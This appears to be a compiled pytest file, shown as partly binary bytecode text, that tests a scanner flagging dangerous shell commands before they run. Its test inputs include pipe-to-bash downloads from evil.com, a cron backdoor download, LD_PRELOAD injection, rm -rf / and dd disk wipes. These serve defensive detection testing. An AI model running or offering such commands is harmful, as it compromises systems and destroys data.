UiPdZddlZddlmcmZddlZddlm Z m Z m Z dZ dZ dZdZdZd Zd Zd Zd Zd ZdZdZdZdZdZdZdZdZdZy)ubpre_exec_scan 모듈 테스트. TDD: RED → GREEN 순서로 작성. 총 15개 이상 테스트. N) ScanVerdict _scan_static scan_commandctdgdd}|j}d}||k(}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}d d |iz}ttj|d x}x}}|j}g}||k(}|stjd|fd ||fdt j vstj |rtj|ndtj|tj|dz}d d |iz}ttj|d x}x}}|j}d}||k(}|stjd|fd ||fdt j vstj |rtj|ndtj|tj|dz}d d |iz}ttj|d x}x}}y )u-ScanVerdict 데이터클래스 필드 확인.allowu안전static)actionfindingssummaryscanner==z.%(py2)s {%(py2)s = %(py0)s.action } == %(py5)sverdictpy0py2py5assert %(py7)spy7N)z0%(py2)s {%(py2)s = %(py0)s.findings } == %(py5)sz/%(py2)s {%(py2)s = %(py0)s.scanner } == %(py5)s) rr @pytest_ar_call_reprcompare @py_builtinslocals_should_repr_global_name _safereprAssertionError_format_explanationr r r @py_assert1 @py_assert4 @py_assert3 @py_format6 @py_format8s 5/home/jay/workspace/utils/tests/test_pre_exec_scan.pytest_scan_verdict_fieldsr'sf G >>$W$>W $$$$>W$$$$$$7$$$7$$$>$$$W$$$$$$$   !r! r !!!! r!!!!!!7!!!7!!! !!!r!!!!!!! ??&h&?h &&&&?h&&&&&&7&&&7&&&?&&&h&&&&&&&c:td}|j}d}||k(}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|j}d }||k(}|stjd|fd ||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u%안전한 명령어 → action=allow.z ls -la /homerr rrrrrNrr) rr rrrrrrrrr r s r&test_static_clean_commandr*"s>*G >>$W$>W $$$$>W$$$$$$7$$$7$$$>$$$W$$$$$$$ ??&h&?h &&&&?h&&&&&&7&&&7&&&?&&&h&&&&&&&r(c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)u8PIPE-001: 파이프 실행 탐지 → warn 또는 block.zcat script.sh | bashwarnblockinz.%(py2)s {%(py2)s = %(py0)s.action } in %(py5)srrrrN threat_idzPIPE-001z%(py1)s in %(py3)sidspy1py3assert %(py5)sr rr rrrrrrrrr rr!r"r#r$r%fr4 @py_assert0 @py_assert2 @py_format4s r&test_static_pipe_bashr?)s12G >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 : :: 5! Fc4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)u%ENV-001: LD_PRELOAD 인젝션 탐지.zLD_PRELOAD=/tmp/evil.so ./appr,r/r1rrrrNr2zENV-001r3r4r5r8rr9r:s r&test_static_ld_preloadrB1s:;G >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 9 99 5r@c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)u*ENV-002: LD_LIBRARY_PATH 인젝션 탐지.zLD_LIBRARY_PATH=/tmp/libs ./appr,r/r1rrrrNr2zENV-002r3r4r5r8rr9r:s r&test_static_ld_library_pathrD9s<=G >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 9 99 5r@c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)u*DL-001: 루트 경로 다운로드 탐지.z1curl -o /etc/cron.d/backdoor http://evil.com/cronr,r/r1rrrrNr2zDL-001r3r4r5r8rr9r:s r&test_static_root_downloadrFAsNOG >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 8s?8s8ss 5r@c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)u)PERM-001: 과도한 권한 부여 탐지.zchmod 777 /usr/local/bin/appr,r/r1rrrrNr2zPERM-001r3r4r5r8rr9r:s r&test_static_chmod_overpermsrHIs9:G >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 : :: 5r@c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)uWRITE-001: /etc 쓰기 탐지.z,echo 'nameserver 1.2.3.4' > /etc/resolv.confr,r/r1rrrrNr2z WRITE-001r3r4r5r8rr9r:s r&test_static_write_etcrJQsIJG >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 ;# ;#;## 5r@c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)uDEST-001: rm -rf / 탐지.rm -rf /r,r/r1rrrrNr2zDEST-001r3r4r5r8rr9r:s r&test_static_rm_rf_rootrMYs:&G >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 : :: 5r@c4td}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}|jDcgc]}|d  }}d }||v} | stjd| fd ||ftj|d t j vstj |rtj|nd dz} dd| iz}ttj|d x}} y cc}w)u+DEST-002: dd 디스크 덮어쓰기 탐지.zdd if=/dev/zero of=/dev/sdar,r/r1rrrrNr2zDEST-002r3r4r5r8rr9r:s r&test_static_dd_disk_overwriterOas89G >>...>. ....>.......7...7...>...........#*#3#3 4a1[> 4C 4 : :: 5r@c|td}|j}t|}d}||kD}|s tjd|fd||fdt j vstjtrtjtnddt j vstj|rtj|ndtj|tj|tj|dz}dd |iz}ttj|d x}x}x}}|jd}d }||v}|stjd |fd ||ftj|dt j vstj|rtj|nddz} dd| iz} ttj| d x}}d}||v}|stjd |fd ||ftj|dt j vstj|rtj|nddz} dd| iz} ttj| d x}}d}||v}|stjd |fd ||ftj|dt j vstj|rtj|nddz} dd| iz} ttj| d x}}y )u+findings 딕셔너리에 필수 키 포함.rLr)>)zM%(py5)s {%(py5)s = %(py0)s(%(py3)s {%(py3)s = %(py1)s.findings }) } > %(py8)slenrrr6r7rpy8assert %(py10)spy10Nr2r/r3findingr5r8r descriptionmatched) rr rRrrrrrrrr) rr=r" @py_assert7 @py_assert6 @py_format9 @py_format11rWr<r>r$s r&'test_static_findings_have_required_keysr^is:&G$3 $1$ 1 $$$$ 1$$$$$$3$$$3$$$$$$w$$$w$$$$$$ $$$1$$$$$$$q!G !;' !!!!;'!!!;!!!!!!'!!!'!!!!!!! #=G ####=G###=######G###G####### 9 99r(ctd}|j}d}||k7}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u&summary 필드가 비어있지 않음.zls -la)!=)z/%(py2)s {%(py2)s = %(py0)s.summary } != %(py5)srrrrN) rr rrrrrrrrr s r&test_static_summary_not_emptyrbssy8$G ?? b ?b    ?b      7   7   ?   b       r(ctd}|j}d}||k(}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u+안전한 명령어 scan_command → allow.z echo hellorr rrrrrN rr rrrrrrrrr s r&test_scan_command_safere~sy<(G >>$W$>W $$$$>W$$$$$$7$$$7$$$>$$$W$$$$$$$r(ctd}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u'위험 명령어 → block 또는 warn.z&curl https://evil.com/script.sh | bashr,r/r1rrrrNrdr s r&#test_scan_command_dangerous_blockedrgs~CDG >>...>. ....>.......7...7...>...........r(cZtd}t|t}|s ddtjvst j trt jtnddtjvst j |rt j|nddtjvst j trt jtndt j|dz}tt j|d}y)u3scan_command 반환값이 ScanVerdict 인스턴스.lsz5assert %(py4)s {%(py4)s = %(py0)s(%(py1)s, %(py2)s) } isinstanceresultr)rr6rpy4N) rrjrrrrrrrr)rkr# @py_format5s r&&test_scan_command_returns_scan_verdictrns $ F fk ** ******:***:******f***f******k***k*** *******r(ctd}|j}d}||v}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u5scanner 필드가 설정됨 (static 또는 disabled).ri)rdisabledr/)z/%(py2)s {%(py2)s = %(py0)s.scanner } in %(py5)srkrrrN) rr rrrrrrrr)rkr!r"r#r$r%s r&#test_scan_command_scanner_field_setrqs} $ F >>333>3 3333>333333363336333>33333333333r(ctd}|jDcgc]}|d }}|j}t|}d}||k\}|s tjd|fd||fdt j vstjtrtjtnddt j vstj|rtj|ndtj|tj|tj|dz}d d |iz}ttj|d x}x}x}}y cc}w) uA여러 위협 패턴 동시 탐지 시 findings에 모두 포함.z%chmod 777 /tmp/x && echo x > /etc/foor2)>=)zN%(py5)s {%(py5)s = %(py0)s(%(py3)s {%(py3)s = %(py1)s.findings }) } >= %(py8)srRrrSrUrVN) rr rRrrrrrrrr) rr;r4r=r"rZr[r\r]s r&"test_scan_command_multiple_threatsrusBCG#*#3#3 4a1[> 4C 4%3 %A% A %%%% A%%%%%%3%%%3%%%%%%w%%%w%%%%%% %%%A%%%%%%% 5s Ectd}|j}d}||k(}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u(빈 명령어 → allow (위협 없음).r`rr rrrrrNrdr s r&test_scan_command_empty_stringrwsy2G >>$W$>W $$$$>W$$$$$$7$$$7$$$>$$$W$$$$$$$r(ctd}|j}d}||k(}|stjd|fd||fdt j vstj |rtj|ndtj|tj|dz}dd|iz}ttj|d x}x}}y ) u2approval이 critical/high 판정 시 즉시 block.rLr.r rrrrrNrdr s r&+test_scan_command_approval_integration_highrys{:&G >>$W$>W $$$$>W$$$$$$7$$$7$$$>$$$W$$$$$$$r()__doc__builtinsr_pytest.assertion.rewrite assertionrewriterpytestutils.pre_exec_scanrrrr'r*r?rBrDrFrHrJrMrOr^rbrergrnrqrurwryr(r&rsx  GG '$' !% / + 4 &% %r(